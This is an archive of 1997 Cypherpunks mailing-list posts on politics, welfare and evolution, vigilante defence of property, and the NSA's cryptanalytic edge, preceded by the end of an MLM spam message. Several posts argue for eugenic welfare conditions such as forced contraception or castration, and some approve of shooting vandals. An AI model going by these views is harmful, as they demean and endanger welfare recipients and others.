show you how to sell INFORMATION on the Internet.
 
Read the program. Study the business. Learn how to make lots of money selling 
Information through MLM and the Internet. You will be amazed at how this 
INFORMATION can change your life FOREVER !.

I invite you to visit my Web Site: 
                              http://members.tripod.com/~Sussexrct/

To find out more information about this OUTSTANDING OPPORTUNITY  and 
to download the $ FREE and Virus FREE software for your review without any 
obligation whatsoever.  Be sure to click on "Products" You will see 6 reports that 
are beneficial for marketing this program or any other you may pursue. Also Click
on "Possibilities" to see what the opportunities are!

I thank you for your time and wish you success.

Respectfully,
R. C. Towlen
Software Distributor
 
 
 
 
 






From tcmay at got.net  Sat Aug 23 02:12:26 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 17:12:26 +0800
Subject: In Defense of Pat Robertson and the "700 Club"
Message-ID: 




Returning home from a night on the town here in scenic Santa Cruz (The
Kingsmen, "Louie Louie" on the Boardwalk, and Dick Dale, "Miserlou" ("Pulp
Fiction") at a local club,  I see various and sundry articles blasting Pat
Robertson. Some are obvious Toto-spoofs, and some quote Robertson as saying
UFO enthusiasts ought to be stoned to death.

In late 1993, months after the Clipper travesty was unveiled, Pat
Robertson's "The 700 Club" denounced Clipper as an unconstitutional, and
perhaps Satanic, plot. Not being a Believer, I can't comment on the Satanic
part.

(At the Hackers Conference, 1993, we sat and watched the "700 Club"
videotape with amazement.)

But I sure do know that I felt more commonality with Pat Robertson and "The
700 Club" than I ever have felt with Billy Bob Clinton and his fake
Christian piety.

If Pat Robertson called for the death by stoning of UFO believers, it was
almost certainly rhetorical hyperbole, like Rush Limbaugh's suggestions of
what ought to be done to lesbians.

I'm not a believe in any religion. but I have more in common with Pat
Robertson or the Grand Mufti of Mormonism than I do with Bill and Hillary
and George and Barbara and Ronnie and Nancy and....


--Tim May, who thinks bashing of Christians can be carried too far.


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Sat Aug 23 02:15:42 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 17:15:42 +0800
Subject: Breaking Legal News.... (fwd)
In-Reply-To: 
Message-ID: 



At 7:18 PM -0700 8/22/97, Greg Broiles wrote:
>>The American legal system has spun out of control. I don't argue that she
>>should not have the right to sue...everybody does. But a judge can quickly
>>dismiss a case on a matter of law.
>
>According to the Mercury-News, the suit has been dismissed.
>
>

Thanks for this info. I looked at it.

Believe me, when I wrote my article this morning (Friday morning)  I did
not know this was happening.

I wonder if Alan still thinks there is merit to the case?

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From aba at dcs.ex.ac.uk  Sat Aug 23 03:23:26 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sat, 23 Aug 1997 18:23:26 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court appointed attorneys")
In-Reply-To: <19970822224234.61793@bywater.songbird.com>
Message-ID: <199708230943.KAA00823@server.test.net>




Kent Crispin  writes:
> On Sat, Aug 23, 1997 at 12:53:08AM +0100, Adam Back wrote:
> > 
> > One doesn't.  But if one is not competent, one is likely to find out the
> > hard way.
> > 
> > There's precious little evolutionary pressures around at the moment,
> > the race could use some more.
> 
> The evolutionary definition of "competent" is "propagate your genetic 
> material".  A rough corollary is that those who raise the most children 
> to child-bearing age are the most competent.  In practice it seems to 
> be the case, however, that intelligence and "evolutionary competence" 
> are negatively correlated.  

I was going to rant about the negative evolutionary pressures, but I
kept it short.  I agree fully.

There are a few evolutionary pressures, but they are insignificant
compared to all the negative pressures.

Positive examples?  

- motorbike riding
- aggresive drivers
- manic depressives
- mountain climbers
- hard drug takers
- drug pushers
- DEA agents

A couple of those don't deserve the negative evolutionary pressures
they surely inflict upon themselves or inherit, a couple do.

There are lots of things around which will kill you slowly, or offer
you a measurable though small chance of dying young, but this usually
doesn't affect that persons chances of reproducing.  Examples might be
smoking, heavy drinking, overeating, etc.

> I think this goes a little deeper, in fact.  The kind of
> intelligence that leads to high technical achievement is not even
> necessarily a kind of intelligence that favors survival under
> difficult situations.  If society dissolves it is my belief that
> computer geeks, like us, are not the ones that will be most likely
> to survive....

So start collecting guns and doing target practice.  Intelligence
includes ability to adapt and forsee likely future events.

Not taking my own advice here owning no guns.  My wife is a crack shot
though from pistol target shooting.  Problem is they're trying to
outlaw most/all types of target pistol over here.

Have lots of children .. to counteract the welfare cases tendencies.
Mormon polygamy?  Harem?

(Again not following own advice, only two children ... so far).

The problem is that from a purely scientific evolutionary point of
view, the human race is surely regressing, the masses of negative
evolutionary pressures are certainly pushing this way.

Welfare cases in the UK are encouraged to hav children by the way the
system is structured.  A single mother is the highest priority case,
with pretty much guaranteed 16 years of preferential treatment, higher
payouts, higher on housing priority lists, and so on.  Female
divorcees with children often get more money, better accomodation, and
more extra fringe benefit handouts than they would ever have married.
Welfare is better than the minimum wage earners lot by a significant
amount.

The problem is what can you do about it?  Well I guess you could
negatively structure the welfare hand out system to discourage them.
You could scrap the welfare system.  They already offer free birth
control advice to teenagers and hand out condoms free without
questions etc.  Free abortions?

The real problem is that the pervasive bleeding heart
socialist/communist welfare system mentality will ensure that you'll
never manage it.

"The children" is a war cry which will ensure the continuance of state
funded negative evolutionary pressures.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <3.0.2.32.19970823052607.00739d30@netcom10.netcom.com>



At 10:43 AM 8/23/97 +0100, Adam Back wrote:
>The problem is what can you do about it?  Well I guess you could
>negatively structure the welfare hand out system to discourage them.
>You could scrap the welfare system.  They already offer free birth
>control advice to teenagers and hand out condoms free without
>questions etc.  Free abortions?

One thing that has been tried here, but was quickly shot down by the
welfare lobby was making Norplant (a two ? year hormonal birth control
device that gets implanted subcutaneously) implants a requirement for
receiving welfare checks.


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From ravage at ssz.com  Sat Aug 23 06:34:34 1997
From: ravage at ssz.com (Jim Choate)
Date: Sat, 23 Aug 1997 21:34:34 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708231333.IAA24258@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 05:26:07 -0700
> From: Lucky Green 
> Subject: Re: lack of evolutionary pressures (was Re: An end to "court
>   appointed attorneys")

> One thing that has been tried here, but was quickly shot down by the
> welfare lobby was making Norplant (a two ? year hormonal birth control
> device that gets implanted subcutaneously) implants a requirement for
> receiving welfare checks.

You need to read the Constitution again, you missed something critical in
there.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From ravage at ssz.com  Sat Aug 23 06:49:05 1997
From: ravage at ssz.com (Jim Choate)
Date: Sat, 23 Aug 1997 21:49:05 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court appointed attorneys") (fwd)
Message-ID: <199708231347.IAA24308@einstein.ssz.com>



Forwarded message:

> Date: Fri, 22 Aug 1997 22:42:34 -0700
> From: Kent Crispin 
> Subject: Re: lack of evolutionary pressures (was Re: An end to "court appointed attorneys")

> The evolutionary definition of "competent" is "propagate your genetic 
> material".  A rough corollary is that those who raise the most children 
> to child-bearing age are the most competent.

With all due respect, bullshit. Fecundity is in no way related to long-term
survival as detailed in the various theories of Neo-Darwinian evolution or
in actual studies. I would suggest strongly that you read Ernst Meyr and get
a better grip on how evolutionary theory works. Just being fecund does not
in any way guarantee success, in fact it may guarantee failure because it
keeps the limits of genetic spread of the population constrained. There is
also a book, Extinction: luck or genes?, which you should look into.

I apologize for not providing better cites but I don't have any of Mayr's or
the extinction book on hand at the moment. They are commenly found in the
science section of larger bookstores though.

Also note that Mayr has a new book out (about a year old I believe) that
covers some of the most recent changes of the punctuated-equilibria and
neo-darminian camps.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From ravage at ssz.com  Sat Aug 23 06:55:39 1997
From: ravage at ssz.com (Jim Choate)
Date: Sat, 23 Aug 1997 21:55:39 +0800
Subject: Fecundity, evolution, & extenction (references)
Message-ID: <199708231353.IAA24354@einstein.ssz.com>



Hi,

If you are interested in the subject of evolution and the various theories
that are competing for pre-imminence then check out:

The Origins of Order: Self-organization and selection in evolution
S.A. Kauffman
ISBN 019507951-5
$32.00

Beyond Natural Selection
R. Wesson
ISBN 0-262-73102-9
$14.95

Embryos, genes, and evolution: The development-genetic basis of evolutionary
                               change
R.A Raff, T.C. Kaufman
ISBN 0-253-34790-4

The evolution and extinction of the Dinosaurs
D.E. Fastovsky, D.B. Weishampel
ISBN 0-521-44496-9


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From jamesd at echeque.com  Sat Aug 23 07:19:38 1997
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 23 Aug 1997 22:19:38 +0800
Subject: FCPUNX:Socio-Economic Cults (Re: CypherPunk Cults)
Message-ID: <199708231403.HAA28264@proxy3.ba.best.com>



At 01:00 PM 8/21/97 -0700, Tim May wrote:
> Interestingly, many of the strategies for moving assets offshore, to
> offshore banks and money havens, is not so much to evade taxes as to
> "protect assets." Protect them from ransom/extortion demands of the _legal
> profession_ sort, e.g., "deep pockets" lawsuits. For example, somebody
> finds out that J. Random Cypherpunk is  financially well off--perhaps from
> the increasing number of online credit report records, etc.--and decides to
> have a convenient "fall" on his property. He then sues for some large
> amount, either covered by Homeowner's Insurance, or more.

In addition to famous deep pockets attacks on big corporations, 
for example the woman who supposedly lost her psychic powers
as a result of a CAT scan, or the silicone lawsuits, there is
also a significant business suing private individuals.

One particular vicious scam is the famous child molestation
accusation.  You privately agree you molested your child and 
pay $50 000 for "therapy", and provided you pay and cooperate
your admission will be kept quiet, or you are charged with ritual 
child abuse involving upside down crucifixes and the like.

> (Don't anybody waste their or my time with penny ante ideas for getting
> small amounts of money out of the country.)

Use the beef futures tactic:   Somebody placed a bet on beef going up.  
If it goes up, it was Tim's offshore corporation that bet on it.  If it
goes down, it was Tim that bet on it.  Gee, it seems that Tim has had
a run of bad luck in his gambling on the futures market.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From mix at earth.wazoo.com  Sat Aug 23 07:36:40 1997
From: mix at earth.wazoo.com (Wazoo MixMaster)
Date: Sat, 23 Aug 1997 22:36:40 +0800
Subject: Shooting the taggers
Message-ID: <199708230816.IAA24167@earth.wazoo.com>




Tim May wrote:
> And yet can J. Random Businessman defend his property against this
> defacing? Nope. The cops say "Let us handle crimes." But they don't.
>
> There's a solution for taggers: snipers.

There appears to be a wonderful market for long-range nonlethal
stun weapons. I wonder, if a tagger is marking your building,
would it be legal to stun him from a distance and then call the
cops?

Rape can be argued to be deserving of serious punishment of some kind,
but would tagging deserve death when a nonlethal option exist? Could
not the woman stun the rapist and then call the cops?

-THE LIE






From JonWienk at ix.netcom.com  Sat Aug 23 08:08:22 1997
From: JonWienk at ix.netcom.com (Jonathan Wienke)
Date: Sat, 23 Aug 1997 23:08:22 +0800
Subject: Shooting the taggers
In-Reply-To: <19970823051427.7115.qmail@hotmail.com>
Message-ID: <3.0.2.32.19970823014629.006a874c@popd.netcruiser>

At 10:14 PM 8/22/97 PDT, John Smith wrote:
>Your own child gets a ride home with a crowd of high-spirited
>troublemakers, and on the way home they bash in J. Cypherpunk's
>mailbox with a baseball bat.  JC appears on his porch and rakes
>the car with his AK-47, killing all on board.  Is this justified?

I wouldn't go that far, but when a group of 10 punks armed with sawed-off,
nail-embedded baseball bats swaggers through the neighborhood, it would be
nice if the residents could disarm them and escort them to the middle of
the Mojave at gunpoint without falling afoul of the LEA's ourselves.

Jonathan Wienke

What part of "the right of the people to keep and bear Arms, shall not be
infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution)

When everyone is armed, criminals fear everyone, not just the police.

PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC
Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred.

US/Canadian Windows 95/NT or Mac users:
Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/
Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html
Commercial version of PGP 5.0 and related products at http://www.pgp.com
Eudora + PGP = Free, Convenient Communication Privacy
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pgp00004.pgp
Type: application/octet-stream
Size: 237 bytes
Desc: "PGP signature"
URL: 

From feanor at nym.alias.net  Sat Aug 23 08:41:40 1997
From: feanor at nym.alias.net (Feanor)
Date: Sat, 23 Aug 1997 23:41:40 +0800
Subject: (none)
Message-ID: <19970823152358.12994.qmail@nym.alias.net>



Excellent rant overall, but I have two little comments.

On Aug 22, 23:24, Anonymous wrote:
} Subject: (none)
> >FROM MOUNTAIN MEDIA
>     FOR IMMEDIATE RELEASE DATED AUG. 31, 1997
>     THE LIBERTARIAN, By Vin Suprynowicz
>     'Necessary to the security of a free State'

Note the date.  It appears to have travelled backwards through time.  :-)
Also, the formatting was awful.  Otherwise, very well written, and I bought the
idea.







From mix at anon.lcs.mit.edu  Sat Aug 23 08:51:51 1997
From: mix at anon.lcs.mit.edu (lcs Mixmaster Remailer)
Date: Sat, 23 Aug 1997 23:51:51 +0800
Subject: Plot of the Platypus
Message-ID: <19970823154001.10729.qmail@nym.alias.net>




In thread "Plot of the Platypus", Conspirator postulates:
> >Please excuse my spelling as I suffer from agraphia see the url in my header.
>   
>    Notice anything a little bit *strange* in the above quotes?
>    Suddenly, "? the Platypus" is the the only one of this group that
>  can spell welfair...warfair......welfare.

In fact, many disorders of reading (alexia) and writing (agraphia)
exist, and are sourced to small lesions in different areas of the brain.
Functionality is so distributed physically, in fact, that there are
even particular lesions which can disrupt reading of phonetic kana
Japanese but not ideographic kanji Japanese.

Since vocabulary appears to be content-separated physically into
different network sections, it is possible the Platypus' problem
only affects some groups of words, and not others. For example,
patients have been found who have lost all use of "fruit" words
like "apple, orange, banana", though they can understand and use
"color" words like "red, orange, yellow".

-THE LIE






From shamrock at netcom.com  Sat Aug 23 09:10:08 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 24 Aug 1997 00:10:08 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
In-Reply-To: <199708231333.IAA24258@einstein.ssz.com>
Message-ID: <3.0.2.32.19970823090344.00768d3c@netcom10.netcom.com>



At 08:33 AM 8/23/97 -0500, Jim Choate wrote:
>> One thing that has been tried here, but was quickly shot down by the
>> welfare lobby was making Norplant (a two ? year hormonal birth control
>> device that gets implanted subcutaneously) implants a requirement for
>> receiving welfare checks.
>
>You need to read the Constitution again, you missed something critical in
>there.

Nope, I didn't. Nowhere is the Constitution does it say that citizens have
a right to welfare money. The State is free to make virtually anything not
expressly prohibited by the Constitution a condition for providing welfare.
Including that the recipient takes positive steps to forestall the breeding
of further welfare recipients. Even making castration a precondition for
receiving welfare would be constitiutional. [I do not advocate such a step].


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From nospam-seesignature at ceddec.com  Sat Aug 23 09:18:49 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Sun, 24 Aug 1997 00:18:49 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: 
Message-ID: <97Aug23.121248edt.32258@brickwall.ceddec.com>



On Fri, 22 Aug 1997, Tim May wrote:

> We haven't discussed this point in  a while, but the belief most
> cryptologists have is roughly this:
> 
> The world-wide community of mathematics and cryptology researchers, linked
> through open publication of new research results, is GREATER than the
> cloistered NSA and GCHQ communities of researchers.
> 
> Thus, as bright as Brian Snow or Don Coppersmith or John Conway may be, the
> "edge" the NSA may have once had is largely gone. Which is not to say that
> they are not still a formidable technical organization, with substantial
> computer resources.

This also applies to the substantial computer resources and technology as
well.

Something on TLC got me thinking about this even before I read this
message.  The NSA has a problem in that, except maybe for quantum
cryptography, they no longer have an advantage of kind, merely of degree,
and the market is narrowing that gap daily.  Before, only they had the
resources to do something like the machine NCR built to crack enigma
messages, and could build many one-of-a-kind machines to do individual
cracking.  They still can, but it isn't efficient to do so today.  They
can build 1000 custom ASICs, but they will be more expensive than 10,000
off-the-shelf CPU chips - they can't do engineering any better or cheaper
than Intel or DEC, and they don't have millions of customers to spread the
fixed costs over.

When a camcorder is more complex than most weapons systems, but is
available at the local mall, and when I can buy SMP servers from an 800
number, I have the same thing the NSA has, only smaller.  But the NSA is
still a finite size (given the earlier posts about terawatts), and I can
link my computer with thousands or millions of others.

DEScrack was only done on a relatively few computers.  If a really big
prize was offered (In this lotto, you just run this screen saver which
uses less bandwidth than pointcast... The chinese radio lottery via the
internet), you could get almost every computer into the act.  As
technology goes forward, any advantage of largess will be overcome by
greater numbers of small systems - at some point the large college
campuses will have more cpu cycles than the NSA because students bring the
latest technology with them.  Unless the NSA is radically different, the
concept of putting a SMP system on everyone's desk (upgrading it every few
years) and linking them isn't going to go over as well as getting 100 new
cray supercomputers. 

--- reply to tzeruch - at - ceddec - dot - com ---






From ravage at ssz.com  Sat Aug 23 09:21:17 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 00:21:17 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708231619.LAA24929@einstein.ssz.com>



Forwarded message:

> From: Lucky Green 
> Subject: Re: lack of evolutionary pressures (was Re: An end to "court
>   (fwd)

> >You need to read the Constitution again, you missed something critical in
> >there.
> 
> Nope, I didn't. Nowhere is the Constitution does it say that citizens have
> a right to welfare money. The State is free to make virtually anything not
> expressly prohibited by the Constitution a condition for providing welfare.

Yes, Lucky you did.

Go read the 10th. The state is NOT (I say again, NOT) allowed to
do anything not expressly allowed because the Constitution is a clear
refutation of this sort of thinking.

> Including that the recipient takes positive steps to forestall the breeding
> of further welfare recipients. Even making castration a precondition for
> receiving welfare would be constitiutional. [I do not advocate such a step].

On one hand you rail against the oppression of people by their government and
then you promote even further oppression, what a hypocrite. Your eugenic
slant on democracy is a disservice.

In case you haven't caught the clue, people don't belong to the government.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From ravage at ssz.com  Sat Aug 23 09:24:05 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 00:24:05 +0800
Subject: Forwarded mail...
Message-ID: <199708231622.LAA24970@einstein.ssz.com>



Forwarded message:

> From: lcs Mixmaster Remailer 
> Subject: Plot of the Platypus

> In fact, many disorders of reading (alexia) and writing (agraphia)
> exist, and are sourced to small lesions in different areas of the brain.
> Functionality is so distributed physically, in fact, that there are
> even particular lesions which can disrupt reading of phonetic kana
> Japanese but not ideographic kanji Japanese.

This is only part of the story. Most persons afflicted with these sorts of
disorders are not caused by any sort of lesion but rather a geneticly based
anomaly in brain development. Dyslexia is a prime example.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From frantz at netcom.com  Sat Aug 23 09:44:12 1997
From: frantz at netcom.com (Bill Frantz)
Date: Sun, 24 Aug 1997 00:44:12 +0800
Subject: lack of evolutionary pressures (was Re: An end to "courtappointed attorneys")
In-Reply-To: <19970822224234.61793@bywater.songbird.com>
Message-ID: 



Hi Adam.  A nice analysis.  However:

At 2:43 AM -0700 8/23/97, Adam Back wrote:
>The problem is what can you do about it?  Well I guess you could
>negatively structure the welfare hand out system to discourage them.
>You could scrap the welfare system.  They already offer free birth
>control advice to teenagers and hand out condoms free without
>questions etc.  Free abortions?
If we are going to do anything for free, it should be things which
encourage population reduction.  Anyone for a charity?

>
>The real problem is that the pervasive bleeding heart
>socialist/communist welfare system mentality will ensure that you'll
>never manage it.
>
>"The children" is a war cry which will ensure the continuance of state
>funded negative evolutionary pressures.

Don't always assume that these are negative evolutionary pressures.  One of
the hallmarks of Homo's evolutionary survival has been the ability to live
in many niches.  Welfare is one niche, and no one should be surprised when
organisms decide to live in an available niche.  The question is, what
happens when that niche goes away?

For example, I have one friend who raised her two children (spaced 12 years
apart) on welfare.  They are now grown and she has a job as a Unix
sysadmin.  She obviously has the ability to move from niche to niche.  (And
doesn't subscribe to the Protestant work ethic.)


-------------------------------------------------------------------------
Bill Frantz       | The Internet was designed  | Periwinkle -- Consulting
(408)356-8506     | to protect the free world  | 16345 Englewood Ave.
frantz at netcom.com | from hostile governments.  | Los Gatos, CA 95032, USA







From jya at pipeline.com  Sat Aug 23 09:47:32 1997
From: jya at pipeline.com (John Young)
Date: Sun, 24 Aug 1997 00:47:32 +0800
Subject: Plot of the Platypus
Message-ID: <1.5.4.32.19970823162730.007303bc@pop.pipeline.com>



THE LIE wrote:
>
>In fact, many disorders of reading (alexia) and writing (agraphia)
>exist, and are sourced to small lesions in different areas of the brain.

Moreover, upon finer resolution of examination or by use of a different tool, 
disorders are often discovered to be indistinguishable from orders with
a slightly larger maw.

Thus, do maws and survivalist manuals and bibles and cults of 
incontrovertible wisdom thrive and beef-up and kudzu every 
more uncontrollability, until ... the four bad-ass dudes ride in to waste the 
evanescent land and mindscape, allowing the cosmo-launder cycle to 
rejigger.

We've a stack of pre-owned omni-space-time prayerbooks for offer,
e-ver or tear-and-blood-stained print.






From shamrock at netcom.com  Sat Aug 23 10:00:57 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 24 Aug 1997 01:00:57 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
In-Reply-To: <199708231619.LAA24929@einstein.ssz.com>
Message-ID: <3.0.2.32.19970823095226.00775be8@netcom10.netcom.com>



At 11:19 AM 8/23/97 -0500, Jim Choate wrote:
>On one hand you rail against the oppression of people by their government and
>then you promote even further oppression, what a hypocrite. Your eugenic
>slant on democracy is a disservice.

Let's try this from a different angle... Say it was charity. Would it, in
your opinion, be constitutional for a private charity to require Norplant
before dispensing the charitable goods and services?



--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From shamrock at netcom.com  Sat Aug 23 10:14:02 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 24 Aug 1997 01:14:02 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: 
Message-ID: <3.0.2.32.19970823100743.00768280@netcom10.netcom.com>



At 12:12 PM 8/23/97 -0400, nospam-seesignature at ceddec.com wrote:
>DEScrack was only done on a relatively few computers.  If a really big
>prize was offered (In this lotto, you just run this screen saver which
>uses less bandwidth than pointcast... The chinese radio lottery via the
>internet), you could get almost every computer into the act.

This is a good point. It took $10,000 (plus some hope for fame) to motivate
thousands of computer users to participate in DESCHALL.  But $10k is not
all that much money. Few people will go to extraordinary measures to get a
long shot chance at winning this relatively small sum. Note that there were
few DESCHALL participants from China, India, and other countries where
there is a substantial numbers of computers.

Now imagine if the prize was $1,000,000 or $10M. That's real money to just
about every student out there. Every box at every university would be
working on it. Employees would install the cracker first and ask their
sysadmin later. If at all.

I you offer such sums, people would find cycles you didn't even know existed.

BTW, I am thinking about organizing corporate sponsorships to beef up the
reward for the RC5-64 crack. I am quite certain that at a $1M prize
offering, I would be cracked faster than DES.


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From tcmay at got.net  Sat Aug 23 10:18:18 1997
From: tcmay at got.net (Tim May)
Date: Sun, 24 Aug 1997 01:18:18 +0800
Subject: lack of evolutionary pressures
In-Reply-To: <19970822224234.61793@bywater.songbird.com>
Message-ID: 



At 2:43 AM -0700 8/23/97, Adam Back wrote:

>There are a few evolutionary pressures, but they are insignificant
>compared to all the negative pressures.
>
>Positive examples?
>
>- motorbike riding
>- aggresive drivers
>- manic depressives
>- mountain climbers
>- hard drug takers
>- drug pushers
>- DEA agents

I have no idea if the traits associated with these activities are to be
considered good or bad, bright or not bright, heritable or not heritable,
etc. Does the slightly greater tendency of mountain climbers to die earlier
than philosophers mean anything? I doubt it.

...
>Have lots of children .. to counteract the welfare cases tendencies.
>Mormon polygamy?  Harem?
>
>(Again not following own advice, only two children ... so far).

Main point: The human genome is now "weighed down" with more than 7 billion
persons, a large fraction of them still capable of reproducing. Bluntly
put, it ain't going _anywhere_, at least not very fast. Changes in the
characteristics of a species, loosely speaking, "evolution," happen faster
in small populations. The tribe of hominids forced out of trees by loss of
forestation in the Rift Zone, for example, will undergo rapid changes over
a few hundred generations.  Billions of humans in the modern era, with
essentially everyone reaching reproductive age, will not. The human genome
is like a supertanker being hit by tennis balls: it just won't move.

Minor point: Adam's children will most likely tend toward the mean. Smart
people tend to mate with other smart people, more or less. Dumb people tend
to mate with other dumb people, more or less. Lots of reasons for this, but
look around and confirm it. So, this will lead to an ever-broader Bell
curve of intelligence, right? Nope. For whatever complicated reasons, the
curve has essentially reached its "normal broadness," to invent a phrase.
Or so I think is the case. Certainly there are ample statistics to show
this.

Other minor point, possibly major: The ROI on the human genome for Adam to
have more children, so as to counteract the stupid breeding more stupid
people, is virtually nil. If Adam likes children, or wants them around him
for whatever reason, fine. But any notion that 2 or 3 or even 5 children
will affect the genome is wishful thinking. Look at the math.

(And not even the infamous "But what if _all_ smart and educated people
thought this way?" applies. First, what Adam or Tim or Blanc does about
having children will not affect the decisions of others. Magical Thinking
101 again. Second, the aforementioned tendency to the mean, for complicated
biochemical/genetic reasons.  Third, even if Adam's children inherited a
persistent "gene for intelligence" which passed on undiminished with time
(or at least in proportion to other such genes from other reproductive
partners in the future), think of how many generations until Adam's magic
gene is in just 0.001% of the population. Hint: a lot.)

Have children if you personally want them, but don't think your having or
not having children has anything to do with saving the species.


>The problem is that from a purely scientific evolutionary point of
>view, the human race is surely regressing, the masses of negative
>evolutionary pressures are certainly pushing this way.

I doubt this in the strongest possible way.

Australia was populated by the common criminals of England, the louts and
scoundrels and thieves and murderers. (Perhaps some "political prisoners,"
but mostly common criminals.) And yet within a generation or two, Australia
was thriving, and today nobody would argue that the descendants of convicts
are dumb or backward.

We aren't changing the genome.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ravage at ssz.com  Sat Aug 23 10:20:55 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 01:20:55 +0800
Subject: lack of evolutionary pressures (was Re: An end to "court (fwd)
Message-ID: <199708231719.MAA25308@einstein.ssz.com>



Forwarded message:

> Date: Sat, 23 Aug 1997 09:52:26 -0700
> From: Lucky Green 
> Subject: Re: lack of evolutionary pressures (was Re: An end to "court
>   (fwd)

